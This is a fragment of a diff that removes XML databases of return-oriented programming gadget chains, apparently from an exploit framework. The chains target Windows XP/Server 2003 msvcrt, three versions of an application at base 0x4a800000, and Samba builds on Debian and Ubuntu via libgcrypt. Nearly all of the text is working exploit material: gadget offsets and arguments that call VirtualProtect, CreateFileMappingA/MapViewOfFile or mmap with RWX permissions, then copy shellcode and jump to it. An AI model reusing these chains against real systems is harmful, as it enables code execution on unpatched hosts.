<gadget offset="0x0003e4fa">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x0003e4fa">skip 4 bytes</gadget>
|
||||
<gadget offset="0x0006a2b4">POP EBX # RETN</gadget>
|
||||
<gadget value="safe_negate_size">Safe size to NEG</gadget>
|
||||
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
|
||||
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
|
||||
<gadget value="junk">JUNK</gadget>
|
||||
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
|
||||
<gadget offset="0x0002a429">POP EDX # RETN</gadget>
|
||||
<gadget value="ffffffc0">0x00000040</gadget>
|
||||
<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
|
||||
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
|
||||
<gadget value="junk">JUNK</gadget>
|
||||
<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
|
||||
<gadget offset="0x0006c4b1">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x0008c638">Writable location</gadget>
|
||||
<gadget offset="0x0000be1d">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x00005383">RETN (ROP NOP)</gadget>
|
||||
<gadget offset="0x00073335">POP ESI # RETN</gadget>
|
||||
<gadget offset="0x0002c7cb">JMP [EAX]</gadget>
|
||||
<gadget offset="0x00076452">POP EAX # RETN</gadget>
|
||||
<gadget offset="0x000010b8">ptr to VirtualProtect()</gadget>
|
||||
<gadget offset="0x0006604e">PUSHAD # RETN</gadget>
|
||||
<gadget offset="0x00014534">ptr to 'jmp esp'</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
</db>
|
|
@ -1,33 +0,0 @@
|
|||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<db>
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>*</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x7c340000">
|
||||
<gadget offset="0x00024c66">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x00024c66">skip 4 bytes</gadget>
|
||||
<gadget offset="0x00004edc">POP EAX # RETN</gadget>
|
||||
<gadget value="safe_negate_size">0x00000201</gadget>
|
||||
<gadget offset="0x00011e05">NEG EAX # RETN</gadget>
|
||||
<gadget offset="0x000136e3">POP EBX # RETN</gadget>
|
||||
<gadget value="0xffffffff"></gadget>
|
||||
<gadget offset="0x00005255">INC EBX # FPATAN # RETN</gadget>
|
||||
<gadget offset="0x0001218e">ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN</gadget>
|
||||
<gadget offset="0x00005937">POP EDX # RETN</gadget>
|
||||
<gadget value="0xffffffc0">0x00000040</gadget>
|
||||
<gadget offset="0x00011eb1">NEG EDX # RETN</gadget>
|
||||
<gadget offset="0x0002c5b9">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x00051e67">Writable location</gadget>
|
||||
<gadget offset="0x00002e58">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x0000d202">RETN (ROP NOP)</gadget>
|
||||
<gadget offset="0x0000f8f4">POP ESI # RETN</gadget>
|
||||
<gadget offset="0x000015a2">JMP [EAX]</gadget>
|
||||
<gadget offset="0x00004edc">POP EAX # RETN</gadget>
|
||||
<gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
|
||||
<gadget offset="0x00038c81">PUSHAD # ADD AL,0EF # RETN</gadget>
|
||||
<gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
</db>
|
|
@ -1,71 +0,0 @@
|
|||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<db>
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>WINDOWS XP SP2</target>
|
||||
<target>WINDOWS XP SP3</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x77c10000">
|
||||
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
|
||||
<gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
|
||||
<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
|
||||
<gadget value="junk">JUNK</gadget>
|
||||
<gadget offset="0x0001362c">POP EBX # RETN</gadget>
|
||||
<gadget offset="0x0004d9bb">Writable location</gadget>
|
||||
<gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
|
||||
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
|
||||
<gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
|
||||
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
|
||||
<gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
|
||||
<gadget value="junk">JUNK</gadget>
|
||||
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
|
||||
<gadget offset="0x0002ee15">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x0002ee15">skip 4 bytes</gadget>
|
||||
<gadget offset="0x0002eeef">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x0004d9bb">Writable location</gadget>
|
||||
<gadget offset="0x0001a88c">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
|
||||
<gadget offset="0x0002a184">POP ESI # RETN</gadget>
|
||||
<gadget offset="0x0001aacc">JMP [EAX]</gadget>
|
||||
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
|
||||
<gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
|
||||
<gadget offset="0x00002df9">PUSHAD # RETN</gadget>
|
||||
<gadget offset="0x00025459">ptr to 'push esp # ret</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>WINDOWS SERVER 2003 SP1</target>
|
||||
<target>WINDOWS SERVER 2003 SP2</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x77ba0000">
|
||||
<gadget offset="0x00012563">POP EAX # RETN</gadget>
|
||||
<gadget offset="0x00001114">VirtualProtect()</gadget>
|
||||
<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
|
||||
<gadget value="junk">JUNK</gadget>
|
||||
<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
|
||||
<gadget offset="0x00029801">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x00042265">ptr to 'push esp # ret'</gadget>
|
||||
<gadget offset="0x00012563">POP EAX # RETN</gadget>
|
||||
<gadget value="0x03C0990F">EAX</gadget>
|
||||
<gadget offset="0x0003d441">SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)</gadget>
|
||||
<gadget offset="0x000148d3">POP EBX, RET</gadget>
|
||||
<gadget offset="0x000521e0">.data</gadget>
|
||||
<gadget offset="0x0001f102">XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN</gadget>
|
||||
<gadget offset="0x0001fc02">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x0004f001">W pointer (lpOldProtect) (-> ecx)</gadget>
|
||||
<gadget offset="0x00038c04">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x00038c05">ROP NOP (-> edi)</gadget>
|
||||
<gadget offset="0x00012563">POP EAX # RETN</gadget>
|
||||
<gadget value="0x03C0944F">EAX</gadget>
|
||||
<gadget offset="0x0003d441">SUB EAX, 03c0940f</gadget>
|
||||
<gadget offset="0x00018285">XCHG EAX,EDX # RETN</gadget>
|
||||
<gadget offset="0x00012563">POP EAX # RETN</gadget>
|
||||
<gadget value="nop">NOP</gadget>
|
||||
<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
</db>
|
|
@ -1,132 +0,0 @@
|
|||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<db>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>9</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x4a800000">
|
||||
<gadget offset="0x2313d">pop ecx # ret</gadget>
|
||||
<gadget offset="0x2a713">push eax # pop esp # ret</gadget>
|
||||
<gadget offset="0x01f90">pop eax # ret</gadget>
|
||||
<gadget offset="0x49038">ptr to CreateFileMappingA()</gadget>
|
||||
<gadget offset="0x07e7d">call [eax] # ret</gadget>
|
||||
<gadget value="0xffffffff">HANDLE hFile</gadget>
|
||||
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
|
||||
<gadget value="0x00000040">DWORD flProtect</gadget>
|
||||
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
|
||||
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
|
||||
<gadget value="0x00000000">LPCTSTR lpName</gadget>
|
||||
<gadget offset="0x0155a">pop edi # ret</gadget>
|
||||
<gadget offset="0x43a84">pop ebp # pop ebx # pop ecx # ret</gadget>
|
||||
<gadget offset="0x2d4de">pop ebx # ret</gadget>
|
||||
<gadget offset="0x01f90">pop eax # ret</gadget>
|
||||
<gadget offset="0x476aa">pop ecx # ret</gadget>
|
||||
<gadget offset="0x49030">ptr to MapViewOfFile()</gadget>
|
||||
<gadget offset="0x44122">mov edx, ecx</gadget>
|
||||
<gadget offset="0x476aa">pop ecx # ret</gadget>
|
||||
<gadget offset="0x07e7d">call [eax] # ret</gadget>
|
||||
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
|
||||
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
|
||||
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
|
||||
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
|
||||
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
|
||||
<gadget offset="0x43a82">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
|
||||
<gadget offset="0x46c5e">jmp IAT msvcr80!memcpy</gadget>
|
||||
<gadget offset="0x476ab">ret</gadget>
|
||||
<gadget value="junk">JUNK</gadget>
|
||||
<gadget value="0x00000400">memcpy length</gadget>
|
||||
<gadget value="junk">JUNK</gadget>
|
||||
<gadget offset="0x17984">xchg eax, ebp # ret</gadget>
|
||||
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>10</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x4a800000">
|
||||
<gadget offset="0x26015">pop ecx # ret</gadget>
|
||||
<gadget offset="0x2e090">push eax # pop esp # ret</gadget>
|
||||
<gadget offset="0x2007d">pop eax # ret</gadget>
|
||||
<gadget offset="0x50038">ptr to CreateFileMappingA()</gadget>
|
||||
<gadget offset="0x246d5">call [eax] # ret</gadget>
|
||||
<gadget value="0xffffffff">HANDLE hFile</gadget>
|
||||
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
|
||||
<gadget value="0x00000040">DWORD flProtect</gadget>
|
||||
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
|
||||
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
|
||||
<gadget value="0x00000000">LPCTSTR lpName</gadget>
|
||||
<gadget offset="0x05016">pop edi # ret</gadget>
|
||||
<gadget offset="0x4420c">pop ebp # pop ebx # pop ecx # ret</gadget>
|
||||
<gadget offset="0x14241">pop ebx # ret</gadget>
|
||||
<gadget offset="0x2007d">pop eax # ret</gadget>
|
||||
<gadget offset="0x26015">pop ecx # ret</gadget>
|
||||
<gadget offset="0x50030">ptr to MapViewOfFile()</gadget>
|
||||
<gadget offset="0x4b49d">mov edx, ecx</gadget>
|
||||
<gadget offset="0x26015">pop ecx # ret</gadget>
|
||||
<gadget offset="0x246d5">call [eax] # ret</gadget>
|
||||
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
|
||||
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
|
||||
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
|
||||
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
|
||||
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
|
||||
<gadget offset="0x14013">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
|
||||
<gadget offset="0x4e036">jmp to IAT msvcr90!memcpy</gadget>
|
||||
<gadget offset="0x2a8df">ret</gadget>
|
||||
<gadget value="junk">JUNK</gadget>
|
||||
<gadget value="0x00000400">memcpy length</gadget>
|
||||
<gadget value="junk">JUNK</gadget>
|
||||
<gadget offset="0x18b31">xchg eax, ebp # ret</gadget>
|
||||
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>11</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x4a800000">
|
||||
<gadget offset="0x5822c">pop ecx # ret</gadget>
|
||||
<gadget offset="0x2f129">push eax # pop esp # ret</gadget>
|
||||
<gadget offset="0x5597f">pop eax # ret</gadget>
|
||||
<gadget offset="0x66038">ptr to CreateFileMappingA()</gadget>
|
||||
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
|
||||
<gadget value="0xffffffff">HANDLE hFile</gadget>
|
||||
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
|
||||
<gadget value="0x00000040">DWORD flProtect</gadget>
|
||||
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
|
||||
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
|
||||
<gadget value="0x00000000">LPCTSTR lpName</gadget>
|
||||
<gadget offset="0x55093">pop edi # ret</gadget>
|
||||
<gadget value="junk">JUNK</gadget>
|
||||
<gadget offset="0x50030">pop ebx # pop esi # pop ebp # ret</gadget>
|
||||
<gadget offset="0x5597f">pop eax # ret</gadget>
|
||||
<gadget offset="0x50031">pop esi # pop ebp # ret</gadget>
|
||||
<gadget value="junk">JUNK</gadget>
|
||||
<gadget offset="0x5822c">pop ecx # ret</gadget>
|
||||
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
|
||||
<gadget offset="0x5d4f8">pop edx # ret</gadget>
|
||||
<gadget offset="0x66030">ptr to MapViewOfFile()</gadget>
|
||||
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
|
||||
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
|
||||
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
|
||||
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
|
||||
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
|
||||
<gadget offset="0x14856">pop edi # pop esi # pop ebp # ret</gadget>
|
||||
<gadget offset="0x505a0">memcpy address</gadget>
|
||||
<gadget offset="0x60bc4">call eax # ret</gadget>
|
||||
<gadget offset="0x505a0">memcpy address</gadget>
|
||||
<gadget offset="0x1c376">xchg eax, ebp # ret</gadget>
|
||||
<gadget offset="0x463d0">pop ebx # ret</gadget>
|
||||
<gadget value="0x00000400">memcpy length</gadget>
|
||||
<gadget offset="0x5d4f8">pop edx # ret</gadget>
|
||||
<gadget offset="0x5d4f8">pop edx # ret</gadget>
|
||||
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
</db>
|
|
@ -1,436 +0,0 @@
|
|||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<db>
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
|
||||
</compatibility>
|
||||
|
||||
<!--
|
||||
dpkg -l|grep libgcrypt
|
||||
ii libgcrypt11 1.4.5-2 LGPL Crypto library - runtime library
|
||||
b6977000-b69e8000 r-xp 00000000 08:01 160176 /usr/lib/libgcrypt.so.11.5.3
|
||||
b69e8000-b69eb000 rw-p 00070000 08:01 160176 /usr/lib/libgcrypt.so.11.5.3
|
||||
-->
|
||||
|
||||
<gadgets base="0">
|
||||
<gadget offset="0x00004d44">pop ebx ; pop ebp ; ret</gadget>
|
||||
<gadget offset="0x00071ad4">offset of .got.plt section</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x00063dbf">pop eax; ret</gadget>
|
||||
<gadget offset="0x00071af4">mmap@got - 4</gadget>
|
||||
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
|
||||
<gadget offset="0x00009974">jmp eax</gadget>
|
||||
<gadget offset="0x00004d41">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
||||
<gadget value ="0x00001000">mmap arg : size</gadget>
|
||||
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
||||
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
||||
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off_t </gadget>
|
||||
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
||||
<gadget offset="0x0006a761">pop edx ; inc ebx ; ret</gadget>
|
||||
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
|
||||
<gadget offset="0x0004159f">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x0005d4c3">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
|
||||
<gadget offset="0x00060a1a">pop esi ; ret</gadget>
|
||||
<gadget offset="0x0005c01b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
|
||||
<gadget offset="0x0003da28">push esp ; and al, 0x0C ; call esi</gadget>
|
||||
<gadget offset="0x00063dbf">pop eax ; ret</gadget>
|
||||
<gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
|
||||
<gadget offset="0x000538c4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
|
||||
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x00055743">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
|
||||
<gadget offset="0x00063dbf">pop eax; ret</gadget>
|
||||
<gadget offset="0x00071b6c">memcpy@got - 4</gadget>
|
||||
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
|
||||
<gadget offset="0x00055743">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
||||
<!-- set ecx to same value than edx -->
|
||||
<gadget offset="0x0006e61f">xchg eax, esi ; ret || save eax</gadget>
|
||||
<gadget offset="0x00063dbf">pop eax; ret</gadget>
|
||||
<gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
|
||||
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
|
||||
<gadget offset="0x0005c914"> xchg eax, ecx ; ret ; || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
||||
<gadget offset="0x0006e61f"> xchg eax, esi ; ret ; || restore eax</gadget>
|
||||
<gadget offset="0x00060a1a">pop esi ; ret</gadget>
|
||||
<gadget offset="0x00071ad4">esi = offset of .got.plt section</gadget>
|
||||
<gadget offset="0x00008505">pop edi ; pop ebp **1** ; ret</gadget>
|
||||
<gadget offset="0x00004d0c">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
||||
<gadget offset="0x0005b68a">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
|
||||
<gadget value ="size">payload size</gadget>
|
||||
</gadgets>
|
||||
|
||||
|
||||
|
||||
|
||||
</rop>
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
|
||||
<target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
|
||||
</compatibility>
|
||||
|
||||
<!--
|
||||
dpkg -l|grep libgcr
|
||||
ii libgcrypt11 1.5.0-1 LGPL Crypto library - runtime library
|
||||
b69e3000-b6a65000 r-xp 00000000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
|
||||
b6a65000-b6a66000 r**p 00081000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
|
||||
b6a66000-b6a68000 rw-p 00082000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
|
||||
-->
|
||||
|
||||
<gadgets base="0">
|
||||
<gadget offset="0x000048ee">pop ebx ; ret</gadget>
|
||||
<gadget offset="0x00082ff4">offset of .got.plt section</gadget>
|
||||
<gadget offset="0x0006933f">pop eax; ret</gadget>
|
||||
<gadget offset="0x000830a4">mmap@got - 4</gadget>
|
||||
<gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
|
||||
<gadget offset="0x00007d79">jmp eax</gadget>
|
||||
<gadget offset="0x00005646">add esp, 0x1C; ret || mmap ret, skip overt mmap arguments</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
||||
<gadget value ="0x00001000">mmap arg : size</gadget>
|
||||
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
||||
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
||||
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off_t </gadget>
|
||||
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
||||
<gadget offset="0x0006fe61">pop edx ; inc ebx ; ret</gadget>
|
||||
<gadget offset="0x00084000">edx = writable location, in GOT</gadget>
|
||||
<gadget offset="0x00046dcd">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; ret || save EAX (mmaped addr) in GOT</gadget>
|
||||
<gadget offset="0x00008532">xchg eax, ecx ; ret || ecx = MMAPed addr, dst in memcpy</gadget>
|
||||
<gadget offset="0x000438ad">mov eax, ecx ; pop ebp ; ret</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp</gadget>
|
||||
<gadget offset="0x000056e8">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
||||
<gadget offset="0x0006933f">pop eax ; ret</gadget>
|
||||
<gadget offset="0x00084100">eax = writable location, in GOT</gadget>
|
||||
<gadget offset="0x000048ee">pop ebx ; ret</gadget>
|
||||
<gadget offset="0x00084100">ebx = writable location, in GOT</gadget>
|
||||
<gadget offset="0x0004cccf">push esp ; add dword [eax], eax ; add byte [ebx+0x5E], bl ; pop edi ; pop ebp ; ret || edi = esp</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp</gadget>
|
||||
<gadget offset="0x00020bad">mov eax, edi ; pop ebx ; pop esi ; pop edi ; ret</gadget>
|
||||
<gadget value ="0x00000000">junk for ebx</gadget>
|
||||
<gadget value ="0x00000048">esi = value to add to esp to point to shellcode</gadget>
|
||||
<gadget value ="0x00000000">junk for edi</gadget>
|
||||
<gadget offset="0x0001ffef">xchg eax, ebx ; ret</gadget>
|
||||
<gadget offset="0x0000c39c">add ebx, esi ; ret || ebx = esp + XX == src in memcpy</gadget>
|
||||
<gadget offset="0x0006933f">pop eax; ret</gadget>
|
||||
<gadget offset="0x00083024">memcpy@got - 4</gadget>
|
||||
<gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
|
||||
<gadget offset="0x0001ffef">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
||||
<gadget offset="0x00004803">pop esi ; ret</gadget>
|
||||
<gadget offset="0x00082ff4">esi = offset of .got.plt section</gadget>
|
||||
<gadget offset="0x00007af3">pop edi ; pop ebp **1** ; ret</gadget>
|
||||
<gadget offset="0x000104c5">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
||||
<gadget offset="0x0001fdfa">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
|
||||
<gadget value ="size">payload size</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>Ubuntu 11.04 / 2:3.5.8~dfsg-1ubuntu2</target>
|
||||
</compatibility>
|
||||
|
||||
<!--
|
||||
dpkg -l|grep libgcr
|
||||
ii libgcrypt11 1.4.6-4ubuntu2 LGPL Crypto library - runtime library
|
||||
b69f8000-b6a69000 r-xp 00000000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
|
||||
b6a69000-b6a6a000 r**p 00070000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
|
||||
b6a6a000-b6a6c000 rw-p 00071000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
|
||||
|
||||
we arrive on rop chain with pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
|
||||
4 first pops are after pop esp
|
||||
-->
|
||||
<gadgets base="0">
|
||||
<gadget offset="0x00071ff4">ebx = offset of .got.plt section</gadget>
|
||||
<gadget value ="0x00000000">esi = junk to be skipped over</gadget>
|
||||
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x000641ff">pop eax; ret</gadget>
|
||||
<gadget offset="0x00072010">mmap@got - 4</gadget>
|
||||
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
|
||||
<gadget offset="0x00007f19">jmp eax</gadget>
|
||||
<gadget offset="0x000046b1">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
||||
<gadget value ="0x00001000">mmap arg : size</gadget>
|
||||
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
||||
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
||||
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off_t </gadget>
|
||||
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
||||
<gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
|
||||
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
|
||||
<gadget offset="0x00041b85">mov dword [edx], eax ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
|
||||
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
||||
<gadget offset="0x0005822d">esi = pop ebx ; pop esi ; pop edi ; ret</gadget>
|
||||
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
||||
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
||||
<gadget offset="0x0005d903">xchg eax, edx ; ret || edx = eax , after memcpy, ret on edx, ie mmaped addr</gadget>
|
||||
<gadget offset="0x00043cd5">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000008 ; call esi || after call, esi = esp </gadget>
|
||||
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
||||
<gadget offset="0x00005c60">xchg eax, esi ; ret</gadget>
|
||||
<gadget offset="0x0005c45c">pop ecx ; ret</gadget>
|
||||
<gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
|
||||
<gadget offset="0x00053dc4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
|
||||
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x0005c6e9">xchg eax, ebx ; ret || ebx = src in memcpy</gadget>
|
||||
<gadget offset="0x000641ff">pop eax; ret</gadget>
|
||||
<gadget offset="0x00072ffc">writable add in GOT - 4</gadget>
|
||||
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = mmaped addr</gadget>
|
||||
<gadget offset="0x0005cd54">xchg eax, ecx ; ret || ecx = MMAPed addr, dst in memcpy</gadget>
|
||||
<gadget offset="0x000641ff">pop eax; ret</gadget>
|
||||
<gadget offset="0x0007204c">memcpy@got - 4</gadget>
|
||||
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
|
||||
<gadget offset="0x0005c6e9">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
||||
<gadget offset="0x00060e5a">pop esi ; ret</gadget>
|
||||
<gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
|
||||
<gadget offset="0x00007d05">pop edi ; pop ebp **1** ; ret</gadget>
|
||||
<gadget offset="0x0005822d">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
||||
<gadget offset="0x0005baca">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
|
||||
<gadget value ="size">payload size</gadget>
|
||||
</gadgets>
|
||||
